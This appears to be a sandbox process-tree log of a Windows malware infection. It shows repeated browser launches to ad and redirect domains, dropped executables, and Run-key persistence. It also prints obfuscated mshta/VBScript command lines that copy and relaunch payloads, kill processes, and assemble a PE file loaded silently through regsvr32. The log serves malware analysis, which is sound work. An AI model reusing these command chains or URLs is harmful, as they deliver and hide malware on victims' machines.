C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0xdc,0x104,0x108,0x100,0x10c,0x7ff870f746f8,0x7ff870f74708,0x7ff870f7471814⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185151313⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff870f746f8,0x7ff870f74708,0x7ff870f7471814⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=208721513⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff870f746f8,0x7ff870f74708,0x7ff870f7471814⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=426311913⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff870f746f8,0x7ff870f74708,0x7ff870f7471814⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=129423113⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff870f746f8,0x7ff870f74708,0x7ff870f7471814⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1492888&var=313⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff870f746f8,0x7ff870f74708,0x7ff870f7471814⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1343177&var=313⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff870f746f8,0x7ff870f74708,0x7ff870f7471814⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=133968013⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x10c,0x110,0x114,0xe8,0x118,0x7ff870f746f8,0x7ff870f74708,0x7ff870f7471814⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1620783&var=313⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff870f746f8,0x7ff870f74708,0x7ff870f7471814⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=134317813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff870f746f8,0x7ff870f74708,0x7ff870f7471814⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.cloud-security.xyz/u/script/redirect.php?zoneid=46513⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0xdc,0x104,0x108,0x100,0x10c,0x7ff870f746f8,0x7ff870f74708,0x7ff870f7471814⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.cloud-security.xyz/u/script/redirect.php?zoneid=46613⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0x100,0xdc,0x7ff870f746f8,0x7ff870f74708,0x7ff870f7471814⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e613⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff870f746f8,0x7ff870f74708,0x7ff870f7471814⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff870f746f8,0x7ff870f74708,0x7ff870f7471814⤵
-
C:\Users\Admin\Pictures\Adobe Films\adF6KxjhcOfjYh4ost48IawU.exe"C:\Users\Admin\Pictures\Adobe Films\adF6KxjhcOfjYh4ost48IawU.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Pictures\Adobe Films\XOi6C0Ymdh5PqNsTC3JWe2Yq.exe"C:\Users\Admin\Pictures\Adobe Films\XOi6C0Ymdh5PqNsTC3JWe2Yq.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\XOi6C0Ymdh5PqNsTC3JWe2Yq.exe"C:\Users\Admin\Pictures\Adobe Films\XOi6C0Ymdh5PqNsTC3JWe2Yq.exe"8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6552 -s 2009⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\JmrC_y7ZqnosVrDZc7UTR80C.exe"C:\Users\Admin\Pictures\Adobe Films\JmrC_y7ZqnosVrDZc7UTR80C.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6032 -s 2768⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Pictures\Adobe Films\Gav9xdYNZl8Zb_Q49AqR0WeW.exe"C:\Users\Admin\Pictures\Adobe Films\Gav9xdYNZl8Zb_Q49AqR0WeW.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon17afe24e0084db3.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC963FAD3\Mon17afe24e0084db3.exeMon17afe24e0084db3.exe6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zSC963FAD3\Mon17afe24e0084db3.exe"C:\Users\Admin\AppData\Local\Temp\7zSC963FAD3\Mon17afe24e0084db3.exe" -u7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon1727c156c4abcec.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC963FAD3\Mon1727c156c4abcec.exeMon1727c156c4abcec.exe6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\7zSC963FAD3\Mon1727c156c4abcec.exeC:\Users\Admin\AppData\Local\Temp\7zSC963FAD3\Mon1727c156c4abcec.exe7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon17332e41e6b.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC963FAD3\Mon17332e41e6b.exeMon17332e41e6b.exe6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\3354555.exe"C:\Users\Admin\AppData\Roaming\3354555.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\238072.exe"C:\Users\Admin\AppData\Roaming\238072.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\8326766.exe"C:\Users\Admin\AppData\Roaming\8326766.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\3515439.exe"C:\Users\Admin\AppData\Roaming\3515439.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBSCRIPt: cLOsE ( CrEATeoBjEcT ( "wsCrIpt.sHelL" ). RUn ("cmd /C copy /y ""C:\Users\Admin\AppData\Roaming\3515439.exe"" LYCw0J.ExE &&stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF """"== """" for %T in ( ""C:\Users\Admin\AppData\Roaming\3515439.exe"") do taskkill /im ""%~nxT"" /f " , 0 ,tRue ) )8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Roaming\3515439.exe" LYCw0J.ExE &&stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF ""== "" for %T in ( "C:\Users\Admin\AppData\Roaming\3515439.exe") do taskkill /im "%~nxT" /f9⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "3515439.exe" /f10⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\LYCw0J.ExELYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj10⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBSCRIPt: cLOsE ( CrEATeoBjEcT ( "wsCrIpt.sHelL" ). RUn ("cmd /C copy /y ""C:\Users\Admin\AppData\Local\Temp\LYCw0J.ExE"" LYCw0J.ExE &&stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF ""/ptCSVoYGd9AYAP_3p6Sjuyj ""== """" for %T in ( ""C:\Users\Admin\AppData\Local\Temp\LYCw0J.ExE"") do taskkill /im ""%~nxT"" /f " , 0 ,tRue ) )11⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Local\Temp\LYCw0J.ExE" LYCw0J.ExE &&stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF "/ptCSVoYGd9AYAP_3p6Sjuyj "== "" for %T in ( "C:\Users\Admin\AppData\Local\Temp\LYCw0J.ExE") do taskkill /im "%~nxT" /f12⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCrIPt: cLOsE (cREAteoBject ( "wscRIPT.SHELl"). Run ( "C:\Windows\system32\cmd.exe /q /r ECho L%Time%07> 2B_LH.IT & EcHO | SEt /P = ""MZ"" > RqS~WQ.qCt& copY /Y /b RqS~WQ.QCt +WL4sXR.MY +JkOFKWNK.Eo7 + 2B_LH.IT BGG1KxA.y & DEl WL4sxR.My JkOFkWNk.EO7 2B_LH.IT RQS~WQ.QCT& stArT regsvr32 .\BgG1KXA.y -U -S " ,0 ,TRUe ) )11⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /q /r ECho L%Time> 2B_LH.IT & EcHO | SEt /P = "MZ" > RqS~WQ.qCt& copY /Y /b RqS~WQ.QCt +WL4sXR.MY+JkOFKWNK.Eo7 +2B_LH.IT BGG1KxA.y & DEl WL4sxR.My JkOFkWNk.EO7 2B_LH.IT RQS~WQ.QCT& stArT regsvr32 .\BgG1KXA.y -U -S12⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SEt /P = "MZ" 1>RqS~WQ.qCt"13⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHO "13⤵
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 .\BgG1KXA.y -U -S13⤵
-
C:\Users\Admin\AppData\Roaming\1702062.exe"C:\Users\Admin\AppData\Roaming\1702062.exe"7⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"8⤵
- Suspicious behavior: SetClipboardViewer
-
C:\Users\Admin\AppData\Roaming\3270715.exe"C:\Users\Admin\AppData\Roaming\3270715.exe"7⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon174a6c5f1664f.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC963FAD3\Mon174a6c5f1664f.exeMon174a6c5f1664f.exe6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\7zSC963FAD3\Mon174a6c5f1664f.exeC:\Users\Admin\AppData\Local\Temp\7zSC963FAD3\Mon174a6c5f1664f.exe7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zSC963FAD3\Mon174a6c5f1664f.exeC:\Users\Admin\AppData\Local\Temp\7zSC963FAD3\Mon174a6c5f1664f.exe7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zSC963FAD3\Mon174a6c5f1664f.exeC:\Users\Admin\AppData\Local\Temp\7zSC963FAD3\Mon174a6c5f1664f.exe7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zSC963FAD3\Mon174a6c5f1664f.exeC:\Users\Admin\AppData\Local\Temp\7zSC963FAD3\Mon174a6c5f1664f.exe7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon17a0d8ec302e.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC963FAD3\Mon17a0d8ec302e.exeMon17a0d8ec302e.exe6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 2847⤵
- Program crash
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon178d8e5d06822.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC963FAD3\Mon178d8e5d06822.exeMon178d8e5d06822.exe6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\7496090.exe"C:\Users\Admin\AppData\Roaming\7496090.exe"9⤵
-
C:\Users\Admin\AppData\Roaming\3518046.exe"C:\Users\Admin\AppData\Roaming\3518046.exe"9⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\1714730.exe"C:\Users\Admin\AppData\Roaming\1714730.exe"9⤵
-
C:\Users\Admin\AppData\Roaming\5676460.exe"C:\Users\Admin\AppData\Roaming\5676460.exe"9⤵
-
C:\Users\Admin\AppData\Roaming\6175967.exe"C:\Users\Admin\AppData\Roaming\6175967.exe"9⤵
-
C:\Users\Admin\AppData\Roaming\8931098.exe"C:\Users\Admin\AppData\Roaming\8931098.exe"9⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBSCRIPt: cLOsE ( CrEATeoBjEcT ( "wsCrIpt.sHelL" ). RUn ("cmd /C copy /y ""C:\Users\Admin\AppData\Roaming\8931098.exe"" LYCw0J.ExE &&stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF """"== """" for %T in ( ""C:\Users\Admin\AppData\Roaming\8931098.exe"") do taskkill /im ""%~nxT"" /f " , 0 ,tRue ) )10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Roaming\8931098.exe" LYCw0J.ExE &&stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF ""== "" for %T in ( "C:\Users\Admin\AppData\Roaming\8931098.exe") do taskkill /im "%~nxT" /f11⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "8931098.exe" /f12⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\inst1.exe"C:\Users\Admin\AppData\Local\Temp\inst1.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Soft1WW01.exe"C:\Users\Admin\AppData\Local\Temp\Soft1WW01.exe"8⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5148 -s 2809⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\chrome.exe"C:\Users\Admin\AppData\Local\Temp\chrome.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5544 -s 17049⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\chrome2.exe"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"8⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"10⤵
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi11⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )12⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"13⤵
-
